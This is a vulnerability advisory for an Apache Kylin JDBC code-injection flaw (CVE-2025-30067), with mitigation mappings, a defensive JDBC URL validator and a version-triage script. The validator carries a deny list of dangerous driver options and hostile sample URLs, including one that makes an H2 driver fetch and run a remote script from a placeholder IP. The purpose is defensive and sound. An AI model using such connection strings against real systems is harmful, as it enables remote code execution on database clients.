CVE-2025-30067
Published: 27 March 2025
Summary
CVE-2025-30067 is a high-severity Code Injection (CWE-94) vulnerability in Apache Kylin. Its CVSS base score is 7.2 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploitation for Privilege Escalation (T1068). The vulnerability ranks at the 47.3rd percentile by exploit likelihood (below the median), and it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 AC-6 (Least Privilege) and SI-10 (Information Input Validation).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
- Flaw remediation: directly mitigates the code-injection vulnerability through timely remediation, i.e. upgrading Apache Kylin to version 5.0.2 or later as the vendor recommends.
- AC-6 (Least Privilege): minimises the set of users holding Kylin system or project admin permissions, which are required to alter JDBC connection configurations and therefore to reach the code-execution path.
- SI-10 (Information Input Validation): requires validation of inputs such as JDBC connection configurations so that an altered configuration cannot be used for code injection (CWE-94).
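As an added illustration of SI-10 applied to JDBC connection settings, here is a small validator written for this page (it is example code, not from the Apache Kylin project, and it does not describe how CVE-2025-30067 itself is triggered). It accepts only allowlisted JDBC subprotocols and driver classes and rejects connection-string options that are publicly known, in widely used JDBC drivers, to let whoever controls the URL read client files, load classes by name or run scripts. The allowlists, the deny list of option names and the config keys `url` and `driver` are assumptions for the example, not Kylin's configuration schema.

```python
import re
from urllib.parse import unquote

# Assumed allowlist for this deployment: only these JDBC subprotocols and
# driver classes may appear in a data-source configuration.
ALLOWED_SUBPROTOCOLS = {"mysql", "postgresql"}
ALLOWED_DRIVER_CLASSES = {"com.mysql.cj.jdbc.Driver", "org.postgresql.Driver"}

# Connection-string options that, in common JDBC drivers, let the party
# controlling the URL read client files, load classes or run scripts.
# Compiled for this example (not taken from the Kylin fix); extend it for
# the drivers you actually ship. Keys are compared lower-cased, which is
# deliberately conservative.
DANGEROUS_OPTIONS = {
    "autodeserialize",        # MySQL Connector/J: deserialize server-supplied objects
    "allowloadlocalinfile",   # MySQL Connector/J: server can read client-side files
    "allowurlinlocalinfile",
    "queryinterceptors",      # MySQL Connector/J: loads interceptor classes by name
    "socketfactory",          # loads an arbitrary class by name
    "init",                   # H2: INIT=RUNSCRIPT FROM '...' runs attacker SQL/Java
}

JDBC_RE = re.compile(r"^jdbc:([a-z0-9]+):(.*)$", re.IGNORECASE)


def parse_jdbc_url(url: str) -> tuple[str, dict[str, str]]:
    """Split a JDBC URL into (subprotocol, options). Options may start at the
    first '?' (MySQL/PostgreSQL style) or ';' (H2/SQL Server style) and are
    separated by '&' or ';'. Keys are percent-decoded so an encoded letter
    cannot smuggle a blocked option past a naive substring check."""
    if any(ord(c) < 0x20 for c in url):
        raise ValueError("control character in JDBC URL")
    m = JDBC_RE.match(url.strip())
    if not m:
        raise ValueError("not a jdbc:<subprotocol>:... URL")
    subprotocol, rest = m.group(1).lower(), m.group(2)
    options: dict[str, str] = {}
    start = re.search(r"[?;]", rest)
    if start:
        for item in re.split(r"[&;]", rest[start.end():]):
            if not item:
                continue
            key, _, value = item.partition("=")
            options[unquote(key).strip().lower()] = unquote(value)
    return subprotocol, options


def validate_jdbc_url(url: str, allowed=ALLOWED_SUBPROTOCOLS) -> tuple[bool, str]:
    """Return (accepted, reason). Rejects unknown subprotocols and any
    option on the deny list; everything else is left to the driver."""
    try:
        subprotocol, options = parse_jdbc_url(url)
    except ValueError as exc:
        return False, str(exc)
    if subprotocol not in allowed:
        return False, f"subprotocol {subprotocol!r} is not allowlisted"
    bad = sorted(k for k in options if k in DANGEROUS_OPTIONS)
    if bad:
        return False, "blocked option(s): " + ", ".join(bad)
    return True, "ok"


def validate_jdbc_config(config: dict) -> tuple[bool, str]:
    """Check a data-source config. The keys 'url' and 'driver' are assumed
    names for this example, not Kylin's actual configuration schema."""
    accepted, reason = validate_jdbc_url(config.get("url", ""))
    if not accepted:
        return False, reason
    driver = config.get("driver", "")
    if driver not in ALLOWED_DRIVER_CLASSES:
        return False, f"driver class {driver!r} is not allowlisted"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample configurations for demonstration (hosts are made up).
    samples = [
        {"url": "jdbc:mysql://db.internal:3306/kylin?useSSL=true",
         "driver": "com.mysql.cj.jdbc.Driver"},
        {"url": "jdbc:mysql://203.0.113.5:3306/x?autoDeserialize=true&queryInterceptors=com.example.Evil",
         "driver": "com.mysql.cj.jdbc.Driver"},
        {"url": "jdbc:mysql://db.internal:3306/kylin?auto%44eserialize=true",
         "driver": "com.mysql.cj.jdbc.Driver"},
        {"url": "jdbc:h2:mem:test;INIT=RUNSCRIPT FROM 'http://203.0.113.5/x.sql'",
         "driver": "org.h2.Driver"},
    ]
    for cfg in samples:
        print(validate_jdbc_config(cfg), cfg["url"])
```

Two design points matter in practice: the check is an allowlist first (unknown subprotocols and driver classes are rejected outright) and a deny list second, and the deny list only works because option keys are percent-decoded and normalised before comparison. Such a validator complements, but does not replace, restricting who may edit the configuration at all (AC-6) and upgrading to a fixed release.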
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The code injection vulnerability allows an authenticated Kylin admin to achieve arbitrary code execution on the host. That maps to T1068 (Exploitation for Privilege Escalation: from application-level admin to code execution on the underlying system) and T1059 (Command and Scripting Interpreter, for running the injected code).
NVD Description
Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Kylin. If an attacker gets access to Kylin's system or project admin permission, the JDBC connection configuration may be altered to execute arbitrary code from the remote. You are fine as long as Kylin's system and project admin access is well protected. This issue affects Apache Kylin: from 4.0.0 through 5.0.1. Users are recommended to upgrade to version 5.0.2 or above, which fixes the issue.
Deeper analysis
CVE-2025-30067 is an Improper Control of Generation of Code ('Code Injection') vulnerability, classified under CWE-94, affecting Apache Kylin versions from 4.0.0 through 5.0.1. The flaw allows manipulation of the JDBC connection configuration by an attacker who already holds system or project admin permissions within Kylin. It carries a CVSS v3.1 base score of 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H): reachable over the network with low attack complexity and no user interaction, but requiring high privileges, with high impact on confidentiality, integrity and availability within an unchanged scope.
An attacker holding Kylin system or project admin access exploits the flaw by altering the JDBC connection configuration so that Kylin loads and executes attacker-supplied code from a remote source. Because that code runs on the host that serves Kylin, confidentiality, integrity and availability of the affected system are all at risk, and no further user interaction is needed once admin access has been obtained. Exploitation therefore hinges on prior attainment of admin privileges; protecting those credentials reduces the risk but does not remove it on unpatched versions.
Apache advisories recommend upgrading to version 5.0.2 or later, which resolves the issue. Detailed announcements are available in the Apache mailing list at https://lists.apache.org/thread/6j19pt8yoqfphf1lprtrzoqkvz1gwbnc and the OSS-Security mailing list at http://www.openwall.com/lists/oss-security/2025/03/27/4.
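The affected range above is the only hard fact a fleet inventory needs to act on. The following triage helper is an added example written for this page (not Apache Kylin code): it parses version strings, applies the advisory's range 4.0.0 through 5.0.1, conservatively treats a pre-release build of 5.0.2 as unpatched, and reports unparseable versions separately instead of silently counting them as safe. The hostnames and versions in the sample inventory are constructed.

```python
import re

# Affected range and fix version as stated in the advisory.
AFFECTED_FROM = (4, 0, 0)
FIXED_IN = (5, 0, 2)

# major.minor.patch with an optional pre-release tag (e.g. "5.0.0-beta").
VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:[-.]([0-9A-Za-z.]+))?$")


def version_key(version: str) -> tuple[int, int, int, int]:
    """Map a version string to a comparable tuple. The fourth element is 0
    for a pre-release and 1 for a final release, so 5.0.2-beta sorts below
    5.0.2 and is therefore treated as still unpatched."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch = (int(m.group(i)) for i in (1, 2, 3))
    return (major, minor, patch, 0 if m.group(4) else 1)


def is_affected(version: str) -> bool:
    """True when 4.0.0 <= version < 5.0.2, i.e. 4.0.0 through 5.0.1."""
    return (*AFFECTED_FROM, 1) <= version_key(version) < (*FIXED_IN, 1)


def triage(hosts: dict[str, str]) -> dict[str, list[str]]:
    """Group hostnames by verdict. A version that cannot be parsed is
    reported as 'unknown' rather than silently treated as safe."""
    report: dict[str, list[str]] = {"affected": [], "not_affected": [], "unknown": []}
    for host, version in hosts.items():
        try:
            bucket = "affected" if is_affected(version) else "not_affected"
        except ValueError:
            bucket = "unknown"
        report[bucket].append(host)
    return report


if __name__ == "__main__":
    # Constructed inventory for demonstration; hostnames and versions are made up.
    inventory = {
        "kylin-prod-1": "5.0.1",
        "kylin-prod-2": "5.0.2",
        "kylin-staging": "4.0.3",
        "kylin-legacy": "3.1.3",
        "kylin-dev": "5.0.2-beta",
        "kylin-unknown": "snapshot",
    }
    for verdict, names in triage(inventory).items():
        print(f"{verdict}: {', '.join(names) or '-'}")
```

Feed it whatever source of truth you have for deployed versions (a CMDB export, the version each instance reports); the point is that the "unknown" bucket is surfaced and worked rather than assumed clean.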
Details
- CWE(s)